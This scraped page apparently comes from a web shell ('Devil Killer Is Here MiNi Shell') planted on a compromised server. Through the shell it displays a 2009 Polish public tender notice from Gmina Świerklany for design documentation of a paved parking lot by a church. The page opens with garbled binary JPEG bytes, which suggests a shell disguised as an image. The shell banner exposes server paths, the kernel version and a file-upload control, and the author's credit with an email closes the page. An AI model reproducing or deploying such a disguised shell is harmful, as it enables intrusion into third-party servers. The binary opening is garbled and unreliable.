JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/68357-N-2009.html

<p class="kh_header"><b>Jankowice: Opracowanie dokumentacji projektowej budowy parkingu o nawierzchni z kostki przy kościele w Świerklanach wraz z budową łacznika z istniejącym parkingiem</b><br>
<b>Numer ogłoszenia: 68357 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świerklany , ul. Świerklańska 54, 44-264 Jankowice, woj. śląskie, tel. 032 4327500, faks 032 4327509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swierklany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej budowy parkingu o nawierzchni z kostki przy kościele w Świerklanach wraz z budową łacznika z istniejącym parkingiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej budowy parkingu o nawierzchni z kostki przy kościele w Świerklanach wraz z budową łacznika z istniejącym parkingiem

2.1. ZAKRES ZLECONEGO OPRACOWANIA:

1. Wykonanie dwóch różnych koncepcji parkingu celem przedstawienia możliwych alternatywnych rozwiązań m.in. komunikacyjnych, szczegółów zagospodarowania etc., a po zaakceptowaniu jednej z koncepcji przez Zamawiającego:
2. Wykonanie badania podłoża gruntowego m.in. celem rozważenia możliwości wykorzystania istniejącej podbudowy przy budowie parkingu.
3. Opracowanie wielobranżowego projektu budowlano-wykonawczego na podstawie zaaprobowanej koncepcji budowy placu postojowego (parkingu) o nawierzchni z kostki wraz z drogami manewrowymi, miejscami parkingowymi oraz odwodnieniem i oświetleniem;
4. Opracowanie projektu budowy chodnika w sąsiedztwie parkingu;
5. Zaprojektowanie uformowania wzmocnienia skarpy w rejonie cieku wodnego;
6. Uzyskanie pozwolenia na budowę i  wszystkich decyzji z nią stowarzyszonych, w tym załaczników w/w decyzji;
7. Opracowanie projektu docelowej organizacji ruchu oraz na czas prowadzonych robót.

OBSZAR OBJĘTY PRZEDMIOTEM ZAMÓWIENIA OBEJMUJE działki 1493/107 (371 m2); 1483/113 (1807 m2);  1494/107 (2639 m2); 1482/112 (2163 m2); 1120/113 (1309 m2). 

Obszar zadania  obejmuje tereny stanowiące własność Gminy Świerklany. Jego granice zostały oznaczone na załączniku graficznym.

Informacje inne:
a) budowa łącznika polegać będzie w szczególności na poszerzeniu istniejącego łącznika 
o nawierzchni asfaltowej w tożsamej  technologii;
b) Projektant winien w pierwszej kolejności  rozważyć możliwość przy budowie ponowne wykorzystanie materiału pochodzącego z odzysku, a w szczególności zastosowanie metody recyklingu ze stabilizacją podłoża cementem o grubości 30 cm;

2.1.1. Koncepcja i projekt winny spełniać następujące oczekiwania Zamawiającego:

a) zawierać rozwiązanie zagospodarowania terenu, związane z właściwym wkomponowaniem zaprojektowanego parkingu w istniejące otoczenie;
b) zapewnienić odpowiednie ilości ilości miejsc parkingowych, niezbędnych do obsłużenia funkcji pobliskiego obiektu - kościoła, należy maksymalnie wykorzystać działki na miejsca parkingowe;
c) założyć na parkingu ruchu 2 - kierunkowy, pomiędzy dwoma parkingami - dolnym istniejącym a górnym projektowanym wraz z organizacją wjazdu i wyjazdu z parkingów 
i oznakowaniem ruchu wewnątrz parkingowego (oznakowanie pionowe i poziome ruchu) 
oraz nawiązaniem z wjazdami do ul. Ligonia;
d) od strony skarp założyć wykonanie barierki wraz z ewentualnym nasadzeniem pasa zieleni;
e) parking przeznaczony dla ruchu lekkiego samochodów (KR 1);
f) wydzielić miejsca parkingowa dla niepełnosprawnych w miejscach najdogodniejszych komunikacyjnie z dojściem do kościoła;
g) zawierać analizę kosztów przyszłej inwestycji;
h) koncepcję winna obejmować swoim zasięgiem wyznaczony obszar działek;
i) w części opisowej należy zdefiniować  technologie budowlane  realizacji przedsięwzięcia.

2.1.2. Dokumentacja projektowa winna zawierać:
- mapy do celów projektowych;
- rozpoznanie medialne wraz z projektem przebudowy bądź zabezpieczenia kolidujących uzbrojeń;
- wielobranżowy projekt budowlano-wykonawczy; 
- pozwolenie na budowę i inne wymagane decyzje administracyjne;
- przedmiary robót; 
- kosztorysy inwestorskie;
- szczegółowe specyfikacje techniczne. 
2.2. Zakres ilościowy dokumentacji projektowej:
Forma papierowa (pisemna):
2.1. Wielobranżowy projekt budowlano-wykonawczy - 5 egz.;
2.2. Przedmiar robót  - 3 egz;
2.3. Specyfikacje techniczne wykonania i odbioru robót - 3 egz.;
2.4. Kosztorys inwestorski -  3 egz.;

Całość dokumentacji projektowej należy załączyć również na nośniku elektronicznym (CD) w formacie: doc., pdf. Pliki muszą być zoptymalizowane pod względem rozmiaru. Jakość zeskanowanych lub wygenerowanych dokumentów,  rysunków technicznych, zdjęć powinna umożliwić odczytanie wszystkich detali i cech oraz powinna nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Forma pisemna (papierowa) musi być tożsama z formą cyfrową dokumentacji projektowej.

Nazwa i kod przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień CPV:
71.32.00.00-7 Usługi inżynieryjne w zakresie projektowania.

2.3. Narady koordynacyjne i kontrola wykonania prac projektowych przez Zamawiającego.

Wykonawca weźmie udział i będzie prezentował wykonanie opracowań projektowych oraz na naradach koordynacyjnych 1 raz w miesiącu w siedzibie Zamawiającego w terminie uzgodnionym z nim. 

2.4. Przy opracowaniu dokumentacji projektowej  należy uwzględnić następujące zalecenia:
1. projekt wykonawczy powinien posiadać wszelkie niezbędne, szczegółowe rozwiązania wynikające z przedmiotu zamówienia i niezbędne do prawidłowej (zgodnej z przepisami prawa) realizacji zadania,
2. projekt powinien posiadać wykaz opracowań oraz pisemnie oświadczenie Wykonawcy - Jednostki Projektowej, że wykonany jest zgodnie z umową, obowiązującymi normami i został wykonany w stanie kompletnym z punktu widzenia celu, któremu ma służyć.
3. Szczegółowe specyfikacje techniczne oraz przedmiary robót powinny być sporządzone na podstawie aktualnie obowiązujących przepisów.
4. Jednostka Projektowa przekaże Zamawiającemu dokumentację projektową w siedzibie Zamawiającego.
5. Części opisowe wykonane będą za pomocą komputerowego edytora tekstów kompatybilnego z MS Word, przedmiar robót i kosztorys ofertowy dostarczyć także w wersji elektronicznej w formacie danych kompatybilnych z MS Excel.

2.5. Wytyczne  do opracowania dokumentacji projektowej:
1. Zamawiający upoważnia Wykonawcę do występowania w jego imieniu w sprawach dot. uzyskania
warunków technicznych od gestorów sieci i urządzeń i uzyskania zezwolenia na realizację inwestycji;
2. przekrój konstrukcyjny uzgodnić z Zamawiającym.
3. konsultować z Zamawiającym zakres robót.
4. w początkowej fazie opracowania dokumentacji ustalić z Zamawiającym szczegółowe warunki do
projektowania - podstawowe dane techniczne, warunki do projektowania z zakresu oznakowania i 
urządzeń bezpieczeństwa ruchu.
5. wykorzystywać w opracowywanej dokumentacji rozwiązania technologiczne optymalne z punktu widzenia kryterium cena/jakość.
6. projekt budowlany winien uzyskać wymagane przepisami szczegółowymi opinie i uzgodnienia.
7. wszelką korespondencję związaną z prowadzonymi pracami projektowymi prowadzić z powiadomieniem Zamawiającego.

2.6. Od Wykonawcy Zamawiający wymaga złożenia zobowiązania do pełnienia nadzoru autorskiego w czasie realizacji inwestycji objętej dokumentacją projektową. Wykonawca  świadczyć będzie przez okres 12 miesięcy (od dnia rozpoczęcia robót  w terenie) nadzoru autorskiego, którego cena została wliczona w wynagrodzenie ofertowe, a  wycena oparta była na założeniu wymagalności nie więcej niż  2 pobytów w miesiącu (na wezwanie Inwestora). Większa ilość pobytów będzie podlegać indywidualnemu rozliczeniu (powyższe zapisy nie mają zastosowania do błędów projektowych, które będą usuwane na każde wezwania Inwestora).
Projekt winien zawierać pisemne oświadczenie Wykonawcy, że został on wykonany zgodnie z umową, obowiązującymi przepisami oraz normami i wydany w stanie kompletnym z punktu widzenia celu, któremu ma służyć.
Dokumentacja projektowa będzie służyć jako opis przedmiotu zamówienia do przetargu w oparciu o Ustawę o zamówieniach publicznych na roboty budowlane oraz realizację robót budowlanych na jej podstawie.
Dokumentacja projektowa w swej treści nie może określać technologii robót, materiałów maszyn i urządzeń w sposób utrudniający uczciwą konkurencję.
Dokumentacja projektowa powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o udzielenie niniejszego zamówienia muszą spełniać poniżej określone warunki udziału w postępowaniu oraz załączyć do wniosku następujące dokumenty i oświadczenia potwierdzające spełnianie tych warunków. 

Warunek 1. Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp, tzn. o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy :
1/ posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2/ posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zmówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3/ znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4/ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
W celu potwierdzenia spełniania powyższego warunku udziału w postępowaniu należy załączyć do wniosku:
1/ oświadczenie z art. 22 ust. 1 ustawy Pzp (formularz oświadczenia w załączeniu);
-jeżeli wykonawca w celu spełnienia warunku 1 korzysta z wiedzy , doświadczenia , potencjału technicznego lub osób zdolnych innych podmiotów, należy złożyć również pisemne zobowiązanie tych podmiotów potwierdzające udostępnienie potencjału technicznego lub osób zdolnych do wykonania zamówienia w zakresie udzielanej pomocy.
W przypadku wykonawców biorących wspólnie udział w postępowaniu - konsorcjum oświadczenie składa pełnomocnik konsorcjum w imieniu całego konsorcjum.

Warunek 2. Wykonawcy ubiegający się o udzielenie zamówienia muszą posiadać uprawnienia do wykonywania działalności lub czynności w zakresie objętym niniejszym zamówieniem oraz nie mogą podlegać wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 oraz ust. 2 pkt 1-3 ustawy Pzp.
W celu potwierdzenia spełniania tego warunku udziału w postępowaniu należy załączyć do wniosku następujące dokumenty i oświadczenie:
1/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, 

W przypadku wykonawców biorących wspólnie udział w postępowaniu -konsorcjum wymogi określone w warunku 2 musi wykazać każdy konsorcjant z osobna.

Warunek 3. Wykonawcy ubiegający się o udzielenie zamówienia muszą wykazać, że posiadają niezbędną wiedzę i doświadczenie zawodowe oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, gwarantującymi należyte wykonanie niniejszego zamówienia. 
Wykonawcy muszą posiadać doświadczenie w realizacji co najmniej 2 zadań o charakterze i złożoności porównywalnych z zakresem rzeczowym i wartością zamówienia wykonanych w okresie trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający uzna za odpowiadające swoim rodzajem i wartością przedmiotowi niniejszego zamówienia usługi polegające na wykonaniu (tj. zakończeniu) 2 zadań będących opracowaniem dokumentacji projektowej na budowę parkingu z kostki  o powierzchni użytkowej minimum 3 000 m2  w każdym zadaniu będacym przedmiotem referencji. 
W celu potwierdzenia spełniania tego warunku udziału w postępowaniu należy załączyć do wniosku następujące oświadczenie i dokumenty:
1/ wykaz usług: wykonanie minimum  2 zadań będących opracowaniem dokumentacji projektowej na budowę parkingu z kostki  o powierzchni użytkowej minimum 3 000 m2  w okresie trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
2/ dokumenty potwierdzające (np. referencje, protokoły odbioru), że wykonane usługi zostały wykonane należycie. Winnien z nich jednoznacznie wynikać zakres rzeczowy, możliwy do porównania z zakresem będącym przedmiotem niniejszego zamówienia.
3/ wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia.
Zamawiający wymaga, aby wykonawca dysponował osobami z następującymi uprawnieniami:
a/ uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, wraz z aktualnym wpisem na listę członków właściwej izby samorządu zawodowego. W celu potwierdzenia spełniania tego warunku udziału w postępowaniu należy załączyć do wniosku o dopuszczenie do udziału w postępowaniu: uprawnienia budowlane oraz aktualny wpis na listę członków właściwej izby samorządu zawodowego. 
- jeżeli w wykazie o którym mowa wykonawca wskazał osoby, którymi dopiero będzie dysponował podczas realizacji zamówienia - pisemne zobowiązanie tych podmiotów.

W przypadku wykonawców biorących wspólnie udział w postępowaniu - konsorcjum, wymogi określone w warunku 3 wykonawcy mogą spełniać łącznie.

Ocena spełniania wszystkich warunków udziału w niniejszym postępowaniu dokonana zostanie zgodnie z formułą -spełnia-nie spełnia- w oparciu o informacje zawarte w przedstawionych przez wykonawców oświadczeniach i dokumentach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty załączone do ofert winne być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy.
Wykonawca zobowiązany jest złożyć ofertę zgodną z treścią określoną we wzorze stanowiącym załącznik do SIWZ.
Wykonawca zobowiązany jest przedłożyć w ofercie oświadczenia oraz dokumenty, potwierdzające spełnianie warunków udziału w postępowaniu, które wyszczególniono poniżej:
1. Formularz oferty - sporządzony wg załącznika do SIWZ;
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
3. Oświadczenie o spełnieniu warunków udziału w postępowaniu wg załącznika do SIWZ (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
4. Wykaz wykonanych usług odpowiadających swoim rodzajem usłudze projektowej stanowiącej przedmiot zamówienia, sporządzony według wzoru stanowiącego załącznika do SIWZ wraz z dokumentami potwierdzającymi spełniania warunku dot. doświadczenia zawodowego, z których  wynikałoby, że usługi te zostały wykonane należycie;
5. Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, sporządzony według wzoru stanowiącego załącznik do SIWZ oraz dokumenty stwierdzające, że co najmniej 1 osoba posiada  ważne uprawnienie budowlane do projektowania w specjalności drogowej oraz jest aktualnym członkiem właściwej izby samorządu zawodowego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swierklany.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świerklany z/s w Jankowicach (44-264) przy ul. Świerklanskiej 54, Referat Inwestycji i Zamówień Publicznych, pok. nr 17..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 10:20, miejsce: Urząd Gminy Świerklany z/s w Jankowicach (44-264) przy ul. Świerklanskiej 54, Referat Inwestycji i Zamówień Publicznych, pok. nr 17..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com